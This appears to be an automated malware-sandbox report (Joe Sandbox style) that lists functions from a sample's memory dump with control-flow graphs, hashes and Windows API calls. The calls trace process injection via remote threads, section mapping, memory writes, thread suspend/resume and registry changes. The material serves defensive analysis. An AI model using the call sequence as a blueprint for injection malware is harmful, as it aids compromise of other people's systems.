                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 210 da8f0-da928 211 da94c-da956 210->211 212 da92a-da93d 210->212 213 da958-da97b 211->213 214 da982-da992 211->214 212->211 220 da93f-da947 212->220 224 da97d-da97e 213->224 225 da9d6-da9db 213->225 215 da9ef-daa0c 214->215 216 da994-da9c2 NtSetInformationProcess 214->216 230 daa0e-daa10 215->230 218 da9c4-da9d4 call dac54 216->218 219 da9e0-da9e8 216->219 233 da9ea-da9ed 218->233 219->233 232 daae3-daafd 220->232 224->214 227 daad3-daad6 225->227 231 daad8-daad9 227->231 227->232 230->227 234 daa16-daa35 230->234 231->232 233->215 233->230 236 daace 234->236 237 daa3b-daa3e 234->237 236->227 237->236 238 daa44-daa74 CreateRemoteThread 237->238 239 daac4-daacc 238->239 240 daa76-daa7d 238->240 239->227 241 daa7f-daa84 call de7b8 240->241 242 daa89-daaa5 call c80d4 240->242 241->242 247 daaa7-daaaf 242->247 248 daab1 ResumeThread 242->248 249 daab7-daac2 FindCloseChangeNotification 247->249 248->249 249->227
                                                          APIs
                                                          • NtSetInformationProcess.NTDLL ref: 000DA9BA
                                                          • CreateRemoteThread.KERNELBASE ref: 000DAA6A
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInformationProcessRemoteThread
                                                          • String ID:
                                                          • API String ID: 3020566308-0
                                                          • Opcode ID: e809e7a55289bdd76e4c287ffba4728d9b536dc639f5e193fe49f29cd2f94f97
                                                          • Instruction ID: db80d7ab1eba394077b56d7b27a5c9655ce27bbdf420c805b10eafc0d5db6a34
                                                          • Opcode Fuzzy Hash: e809e7a55289bdd76e4c287ffba4728d9b536dc639f5e193fe49f29cd2f94f97
                                                          • Instruction Fuzzy Hash: 3E51B330718B058FEB64EF28D89966A77E1EB9A301F00452EE94AC3351EF35D845CB53
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000DB948, Relevance: 4.0, APIs: 2, Instructions: 1012synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 278 db948-db9c3 281 db9f9 278->281 282 db9c5-db9f7 call c10cc 278->282 283 db9fe-dba01 281->283 282->283 286 dba07-dba30 CreateMutexExA 283->286 287 dc491-dc4ad 283->287 290 dba4e-dba51 286->290 291 dba32-dba37 286->291 294 dc48e-dc48f 290->294 295 dba57-dba7e 290->295 292 dba39-dba46 291->292 293 dba4b-dba4c 291->293 292->294 293->290 294->287 298 dba84-dbad0 295->298 299 dbb47 295->299 311 dbae7-dbafb 298->311 312 dbad2-dbad9 298->312 300 dbb4c-dbb4f 299->300 300->287 302 dbb55-dbb96 300->302 305 dbb9c-dbba2 302->305 306 dbca7 302->306 308 dbba4-dbbb2 305->308 309 dbc10-dbc35 305->309 310 dbcac-dbcaf 306->310 313 dbbb4-dbbfc 308->313 323 dbc9d-dbca5 309->323 324 dbc37-dbc55 309->324 310->287 314 dbcb5-dbcd0 GetUserNameA 310->314 320 dbb01-dbb2b 311->320 312->311 315 dbadb-dbae1 call bb404 312->315 316 dbbfe-dbc02 313->316 317 dbc08-dbc0e 313->317 318 dbd01-dbd13 314->318 319 dbcd2-dbcee 314->319 315->311 316->317 317->309 317->313 325 dbd1c-dbd65 318->325 326 dbd15-dbd1a 318->326 319->318 335 dbcf0-dbcf9 319->335 331 dbb2d-dbb45 320->331 323->310 338 dbc57-dbc69 324->338 345 dbd78-dbd79 325->345 346 dbd67-dbd70 325->346 326->325 327 dbd87-dbd8c 326->327 336 dbdce-dbdd1 327->336 337 dbd8e-dbdaf 327->337 331->300 335->318 339 dbde8-dbe1f 336->339 340 dbdd3-dbde3 call ddb0a 336->340 351 dbdb1-dbdb8 337->351 352 dbdc3-dbdcb 337->352 338->338 341 dbc6b-dbc9b 338->341 349 dbe21-dbe41 339->349 350 dbe83 339->350 340->339 341->310 355 dbd81 345->355 358 dbea6-dbeb2 346->358 359 dbd76 346->359 365 dbe47-dbe65 call b83bc 349->365 353 dbe88-dbe8b 350->353 351->352 356 dbdba-dbdc1 351->356 352->336 353->287 357 dbe91-dbe94 353->357 355->327 356->336 361 dbe9d-dbea0 357->361 362 dbe96 call c98fc 357->362 363 dbf2c-dbf3e call c3de4 358->363 364 dbeb4-dbee5 call bdccc 358->364 359->355 361->287 361->358 372 dbe9b 362->372 377 dbf78-dbf8a call c1164 363->377 378 dbf40-dbf71 call bdccc 363->378 364->363 374 dbee7-dbeef 364->374 375 dbe75 365->375 376 dbe67-dbe71 365->376 372->361 374->363 379 dbef1-dbf26 call d9700 374->379 381 dbe7a-dbe81 375->381 376->365 380 dbe73 376->380 388 dbf92-dbfde call c2a8c call de4a4 call b415c 377->388 387 dbf73-dbf74 378->387 378->388 379->363 380->381 381->353 387->377 397 dc007-dc00a call c341c 388->397 398 dbfe0-dbfff 388->398 401 dc00f-dc014 397->401 398->397 401->287 402 dc01a-dc033 401->402 402->287 404 dc039-dc061 402->404 406 dc087-dc0b1 call b1cc4 404->406 407 dc063-dc078 404->407 412 dc0c0-dc0d0 406->412 413 dc0b3-dc0bb 406->413 407->406 411 dc07a-dc082 407->411 411->287 414 dc23e-dc245 412->414 415 dc0d6-dc114 call b1cc4 412->415 413->287 416 dc3ce-dc3d7 414->416 417 dc24b-dc26f call c374c 414->417 433 dc124-dc143 415->433 434 dc116-dc11c 415->434 416->294 421 dc3dd-dc3e2 416->421 428 dc275-dc295 call d353c 417->428 429 dc312-dc333 call c374c 417->429 424 dc454-dc482 call b1cc4 421->424 425 dc3e4-dc3e7 421->425 424->413 437 dc488-dc48b 424->437 430 dc3f9-dc416 425->430 431 dc3e9-dc3f3 425->431 428->429 444 dc297-dc2a4 428->444 429->416 443 dc339-dc356 call d353c 429->443 430->424 446 dc418-dc44a 430->446 431->430 450 dc145-dc17e call c56d0 433->450 451 dc183-dc1c8 433->451 434->433 437->294 443->416 454 dc358-dc365 443->454 448 dc2a6-dc2eb call b62ec call d7e04 444->448 449 dc300-dc30a 444->449 446->424 448->449 473 dc2ed-dc2fb call dd734 448->473 449->429 450->451 457 dc20b-dc211 451->457 458 dc1ca-dc1e7 call b1cc4 451->458 459 dc3bc-dc3c6 454->459 460 dc367-dc3ae call b62ec call d7e04 454->460 470 dc213-dc216 457->470 468 dc1e9-dc1ee 458->468 469 dc1f0-dc209 458->469 459->416 460->459 483 dc3b0-dc3b7 call bd9f4 460->483 468->470 469->470 470->287 474 dc21c-dc227 470->474 473->449 474->416 479 dc22d-dc239 call d2754 474->479 479->416 483->459
                                                          APIs
                                                          • CreateMutexExA.KERNEL32 ref: 000DBA13
                                                          • GetUserNameA.ADVAPI32 ref: 000DBCBF
                                                            • Part of subcall function 000B1CC4: CreateThread.KERNELBASE ref: 000B1CF4
                                                            • Part of subcall function 000B1CC4: QueueUserAPC.KERNELBASE ref: 000B1D0B
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateUser$MutexNameQueueThread
                                                          • String ID:
                                                          • API String ID: 2503873790-0
                                                          • Opcode ID: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                          • Instruction ID: d4cef62b5e1f39e8bd6fc26486a850ad9d6c79fc0169e1a1817f0a1686a2c117
                                                          • Opcode Fuzzy Hash: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                          • Instruction Fuzzy Hash: F862A471618B488FE758EF68EC85AA977E1F758700F10452FD48BC3262DE38D946CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000C5B80, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 538 c5b80-c5bc2 540 c5bc8-c5c0b 538->540 541 c5d93 538->541 545 c5d7f-c5d91 540->545 546 c5c11-c5c30 540->546 542 c5d98-c5dbb 541->542 545->542 546->545 549 c5c36-c5c55 546->549 549->545 551 c5c5b-c5c7a 549->551 551->545 553 c5c80-c5c9f 551->553 553->545 555 c5ca5-c5d27 call c10cc NtCreateSection 553->555 558 c5d6e-c5d73 555->558 559 c5d29-c5d46 call c8b90 555->559 563 c5d75-c5d77 558->563 564 c5d48-c5d62 call c10cc 559->564 565 c5d64-c5d6c 559->565 563->545 566 c5d79-c5d7d 563->566 564->563 565->563 566->542
                                                          APIs
                                                          • NtCreateSection.NTDLL ref: 000C5D22
                                                            • Part of subcall function 000C8B90: NtMapViewOfSection.NTDLL ref: 000C8BDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Section$CreateView
                                                          • String ID: 0
                                                          • API String ID: 1585966358-4108050209
                                                          • Opcode ID: 40bb1598f9154bb559e81318fc058f53894861c0a25be57b6af6ff67e1b9a0e8
                                                          • Instruction ID: de137444d667847429bb5b19ea5a704764b7dda53f31df986373f3d9e10dc3e4
                                                          • Opcode Fuzzy Hash: 40bb1598f9154bb559e81318fc058f53894861c0a25be57b6af6ff67e1b9a0e8
                                                          • Instruction Fuzzy Hash: DD61A67061CF098FDB64EF18D889B6977E1FBA8301F10456EE84AC7265DB34E941CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000BFCA8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 570 bfca8-bfcbc 571 bfcbe-bfce9 NtAllocateVirtualMemory 570->571 572 bfd02-bfd0a 570->572 573 bfceb-bfcfb 571->573 574 bfcfd-bfcfe 571->574 573->572 574->572
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL ref: 000BFCE5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID: @
                                                          • API String ID: 2167126740-2766056989
                                                          • Opcode ID: 7156798f28e224d12ba43a52bf34910b9fbde10ea3a108692921d49310c2351a
                                                          • Instruction ID: 2f844c0e4fcf1a1fd44552f11012fdddc53b3b23eeb017693951de13c3224b64
                                                          • Opcode Fuzzy Hash: 7156798f28e224d12ba43a52bf34910b9fbde10ea3a108692921d49310c2351a
                                                          • Instruction Fuzzy Hash: 56F09070615A048BDB44DFA8D8CD6B977E0F758305F90096DE51ACB254DB788948C745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000EF004, Relevance: 3.3, APIs: 2, Instructions: 340nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 577 ef004-ef041 579 ef043-ef050 577->579 580 ef051-ef063 577->580 579->580 581 ef33d-ef355 580->581 582 ef069-ef082 580->582 590 ef358-ef36a 581->590 583 ef088-ef091 582->583 584 ef237-ef282 NtProtectVirtualMemory 582->584 583->584 585 ef097-ef09f 583->585 587 ef31c-ef31e 584->587 588 ef288-ef289 584->588 589 ef0a2-ef0ae 585->589 587->590 591 ef320-ef33b 587->591 592 ef28d-ef28f 588->592 594 ef0cc-ef0fa 589->594 595 ef0b0-ef0b1 589->595 591->590 592->590 593 ef295-ef299 592->593 596 ef29b-ef2af 593->596 597 ef2b1-ef2b5 593->597 604 ef228-ef229 594->604 605 ef100-ef111 594->605 598 ef0b3-ef0ca 595->598 600 ef2d0-ef316 NtProtectVirtualMemory 596->600 601 ef2cd-ef2ce 597->601 602 ef2b7-ef2cb 597->602 598->594 598->598 600->587 600->592 601->600 602->600 608 ef22e-ef231 604->608 606 ef11e-ef13a 605->606 607 ef113-ef118 605->607 610 ef20c-ef220 606->610 611 ef140-ef17e 606->611 607->606 609 ef204-ef205 607->609 608->584 608->590 609->610 610->589 612 ef226 610->612 615 ef1a7-ef1c3 611->615 616 ef180-ef188 611->616 612->608 620 ef1c8-ef1ca 615->620 621 ef1c5 615->621 617 ef18a-ef191 616->617 618 ef193-ef1a4 616->618 617->617 617->618 618->615 622 ef1fe-ef1ff 620->622 623 ef1cc-ef1ee 620->623 621->620 622->609 623->610 624 ef1f0-ef1f9 623->624 624->611
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL ref: 000EF27A
                                                          • NtProtectVirtualMemory.NTDLL ref: 000EF309
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755718156.00000000000EF000.00000040.00020000.sdmp, Offset: 000EF000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_ef000_control.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 657d0230eb3c5e11ffdc8c28530785ca78267f022dac7e4fb701294f8bc7cf9e
                                                          • Instruction ID: 2c1d682e74678751625dbce91645c8815f9cc760a0225ce2f875abf3def0cac4
                                                          • Opcode Fuzzy Hash: 657d0230eb3c5e11ffdc8c28530785ca78267f022dac7e4fb701294f8bc7cf9e
                                                          • Instruction Fuzzy Hash: 68A1F23120CBC98FC765DF29D8856B9B7E1FB96300F5849BED0CBC7252D634A9468742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000DD110, Relevance: 3.2, APIs: 2, Instructions: 183memorynativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 699 dd110-dd147 RtlAllocateHeap 700 dd14d-dd18d call c10cc NtQueryInformationProcess 699->700 701 dd2d9-dd2f3 699->701 704 dd2c7-dd2d1 700->704 705 dd193-dd1bd call b4580 700->705 704->701 705->704 708 dd1c3-dd1ce 705->708 708->704 709 dd1d4-dd1f7 call b4580 708->709 709->704 712 dd1fd-dd224 call b4580 709->712 712->704 715 dd22a-dd24f 712->715 715->704 716 dd251-dd255 715->716 716->704 717 dd257-dd27e call b4580 716->717 717->704 720 dd280-dd287 717->720 721 dd28e-dd291 720->721 722 dd289-dd28a 720->722 721->704 723 dd293-dd2b3 call b4580 721->723 722->721 723->704 726 dd2b5-dd2b7 723->726 727 dd2bd-dd2be 726->727 728 dd2b9-dd2bb 726->728 729 dd2c0-dd2c4 727->729 728->729 729->704
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 000DD13B
                                                          • NtQueryInformationProcess.NTDLL ref: 000DD185
                                                            • Part of subcall function 000B4580: NtReadVirtualMemory.NTDLL ref: 000B459F
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeapInformationMemoryProcessQueryReadVirtual
                                                          • String ID:
                                                          • API String ID: 886377554-0
                                                          • Opcode ID: 7538145d463cbd389560cfa1eca2a20c3f42fc5358184b3495427114d91d50a0
                                                          • Instruction ID: f7df56eb027547f72a28ed68ce29be77e8c752cf5d088f6e211a63a1d5a0b270
                                                          • Opcode Fuzzy Hash: 7538145d463cbd389560cfa1eca2a20c3f42fc5358184b3495427114d91d50a0
                                                          • Instruction Fuzzy Hash: 64515330618B488BDB59EB28E8857AA73E5FB98341F04452FE84EC3246EF34DD45C796
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000DB230, Relevance: 1.8, APIs: 1, Instructions: 286memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateHeap
                                                          • String ID:
                                                          • API String ID: 10892065-0
                                                          • Opcode ID: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                          • Instruction ID: f2761454506913d27003a9400cdceca0c66fd8aaed2b1be7685eb078831b5b29
                                                          • Opcode Fuzzy Hash: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                          • Instruction Fuzzy Hash: 5C81A230618B498FE758EF68EC8976A33E5FB98315F15453EE44AC3261EF78D8428B41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000D3400, Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: c772d9d63cc4f3cf214e68fa05504b1b36572458740193c2b27b3804a6b0d157
                                                          • Instruction ID: 5bdce21a249d8ba52bf29982604c857489102928dcb3f76ee5e0070e5c72c9b8
                                                          • Opcode Fuzzy Hash: c772d9d63cc4f3cf214e68fa05504b1b36572458740193c2b27b3804a6b0d157
                                                          • Instruction Fuzzy Hash: FF314F30718B058BE758EF7CD898666B7F2EBD9301F04893EA505C7264DB39E9448B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000CE860, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 000CE886
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                          • Instruction ID: 908c58438c442a2933d4298d96599fa7bfcb212c9bf145d686fbb0f812c42670
                                                          • Opcode Fuzzy Hash: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                          • Instruction Fuzzy Hash: 8F018130318E4D8FAB94EF68D8C4E6973E5FBA8305B50056EA40EC7164DB38D885CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000C8B90, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                          • Instruction ID: c5c51738017296730dd2ba60ec1415bc6697badd7048af22074d08cfebbc504e
                                                          • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                          • Instruction Fuzzy Hash: 2501D2B0A08B048FCB48EF69D0C8969BBE1FB58311B10467FE949CB796DB70D885CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000C1950, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL ref: 000C196F
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: 3c8ab56f3603755e988b26635f94d5e2d310067f79c5e42d2b82552f2c8fabb7
                                                          • Instruction ID: 3054d3c5f8ae66e0ff1a7ab5ad353b0a390764cd5d2ab8263aea14acc681eb8b
                                                          • Opcode Fuzzy Hash: 3c8ab56f3603755e988b26635f94d5e2d310067f79c5e42d2b82552f2c8fabb7
                                                          • Instruction Fuzzy Hash: 80E0DF74B24A454FEB006BB888C87BC73E0FB8A301F10083EE885C73A1C63DC8408382
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000B4580, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MemoryReadVirtual
                                                          • String ID:
                                                          • API String ID: 2834387570-0
                                                          • Opcode ID: 64682deeea1213f3746396a1f6b31cb179b6a226c19b00d98d77230462052776
                                                          • Instruction ID: f9b6b33235d3ecc3e75959ea42f597c6189948c5f6ddaa13928d888516b2e043
                                                          • Opcode Fuzzy Hash: 64682deeea1213f3746396a1f6b31cb179b6a226c19b00d98d77230462052776
                                                          • Instruction Fuzzy Hash: 1DE0DF34720F444BEB20AFB488C967C77D0F798305F200939E845C7326C639C8848B42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000C2A8C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 c2a8c-c2ad3 call c374c 3 c2ad9-c2b0a RegQueryValueExA 0->3 4 c2b6b-c2b72 0->4 5 c2b0c-c2b11 3->5 6 c2b13-c2b1c call d3400 3->6 7 c2b74-c2b7c 4->7 8 c2ba6-c2bae 4->8 5->6 9 c2b21-c2b2d 5->9 6->9 11 c2b9c 7->11 12 c2b7e-c2b9a call d1b94 7->12 13 c2bb0-c2bbd call c9b20 8->13 14 c2bc3-c2bd2 8->14 15 c2b2f-c2b5e RegSetValueExA 9->15 16 c2b60-c2b65 RegCloseKey 9->16 11->8 12->8 12->11 13->14 15->16 16->4
                                                          APIs
                                                            • Part of subcall function 000C374C: RegCreateKeyA.ADVAPI32(?,?,?,000DDCD3), ref: 000C376F
                                                          • RegQueryValueExA.KERNELBASE ref: 000C2B00
                                                          • RegSetValueExA.KERNELBASE ref: 000C2B58
                                                          • RegCloseKey.KERNELBASE ref: 000C2B65
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value$CloseCreateQuery
                                                          • String ID: ($(
                                                          • API String ID: 409396109-222463766
                                                          • Opcode ID: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                          • Instruction ID: c9df155520831b52f48cb9ce1d7d71684e8f3f3bfd09a888ed02773081d49543
                                                          • Opcode Fuzzy Hash: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                          • Instruction Fuzzy Hash: E031A434618B088FE764EF18EC59B6AB7E5FB98305F10052DE44AC3261DB789D46CB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000C80D4, Relevance: 6.2, APIs: 4, Instructions: 237threadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 165 c80d4-c8134 call c10cc 168 c8158-c8160 165->168 169 c8136-c8155 165->169 170 c8188-c8193 168->170 171 c8162-c8182 call ce95c 168->171 169->168 174 c8195-c819b call dd110 170->174 175 c81a3-c81c5 call b4580 170->175 171->170 181 c830f-c8313 171->181 179 c81a0-c81a1 174->179 184 c81cb-c81d1 175->184 185 c8307-c830d 175->185 179->175 182 c8315-c8316 181->182 183 c8320-c833d 181->183 182->183 186 c81d7-c81fc VirtualProtectEx 184->186 187 c8300-c8305 184->187 185->181 189 c81fe-c8216 call dd2f4 186->189 190 c8218 186->190 187->181 192 c821a-c821c 189->192 190->192 192->185 194 c8222-c8228 192->194 195 c822d-c8269 ResumeThread SuspendThread 194->195 197 c827f-c8281 195->197 198 c826b-c8277 195->198 199 c828d-c8295 197->199 200 c8283-c828b 197->200 198->197 202 c829e-c82b5 call ce95c 199->202 203 c8297-c829c 199->203 200->195 200->199 204 c82b7-c82e4 VirtualProtectEx 202->204 203->204 204->181 207 c82e6-c82fe call dd2f4 204->207 207->181
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectThreadVirtual$ResumeSuspend
                                                          • String ID:
                                                          • API String ID: 3483329683-0
                                                          • Opcode ID: ffbd531617e9de6398172a96c7478380edc2f1a6ff7c6ff8001d704803e1d92c
                                                          • Instruction ID: 2929a7da2bd067356a96c4f23b588884e97c8309648660c369e5d1767eb10d0e
                                                          • Opcode Fuzzy Hash: ffbd531617e9de6398172a96c7478380edc2f1a6ff7c6ff8001d704803e1d92c
                                                          • Instruction Fuzzy Hash: 2661A73061CB484FD7A8EF18E845BAE73D5FB99305F10852EE58AC3292DF34D9458B46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000D99D0, Relevance: 6.1, APIs: 4, Instructions: 146fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 251 d99d0-d99fa call c4050 254 d9a00-d9a17 call ca140 251->254 255 d9b12-d9b29 251->255 258 d9a1d-d9a3a 254->258 259 d9afe-d9b0a 254->259 260 d9a3c-d9a56 258->260 261 d9a58-d9a69 258->261 259->255 260->261 262 d9a6a-d9a75 260->262 261->262 262->259 263 d9a7b-d9aae CreateFileA 262->263 263->259 264 d9ab0-d9ac3 SetFilePointer 263->264 265 d9af5-d9af8 FindCloseChangeNotification 264->265 266 d9ac5-d9ae5 ReadFile 264->266 265->259 266->265 267 d9ae7-d9aec 266->267 267->265 268 d9aee-d9af3 267->268 268->265
                                                          APIs
                                                          • CreateFileA.KERNELBASE ref: 000D9AA1
                                                          • SetFilePointer.KERNELBASE ref: 000D9ABB
                                                          • ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000CED0C), ref: 000D9ADD
                                                          • FindCloseChangeNotification.KERNELBASE ref: 000D9AF8
                                                          Memory Dump Source
                                                          • Source File: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, Offset: 000B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_38_2_b1000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                          • String ID:
                                                          • API String ID: 2405668454-0
                                                          • Opcode ID: 71d59c8fd03c1f47d27e273b6030a364b82ed69c839053eddebff289bcd6d591
                                                          • Instruction ID: fabeb349093372402c5425dc1cffa6cc10337b07d3187b8fffef2cfeb8130cf1
                                                          • Opcode Fuzzy Hash: 71d59c8fd03c1f47d27e273b6030a364b82ed69c839053eddebff289bcd6d591
                                                          • Instruction Fuzzy Hash: 6241C63021CA084FDB58DF2CD8C8A2977E1FB88314F25466EE19AC7252DA79D843C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000D6508, Relevance: 4.6, APIs: 3, Instructions: 101registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 269 d6508-d6559 RegQueryValueExA 270 d655b-d655f 269->270 271 d6561-d6579 RtlAllocateHeap 269->271 272 d6595-d65b1 270->272 273 d657b 271->273 274 d65b2-d65d9 RegQueryValueExA 271->274 275 d657e-d6581 273->275 274->275 276 d65db-d65e5 274->276 275->272 277 d6583-d658d 275->277 276->272 277->272
                                                          APIs
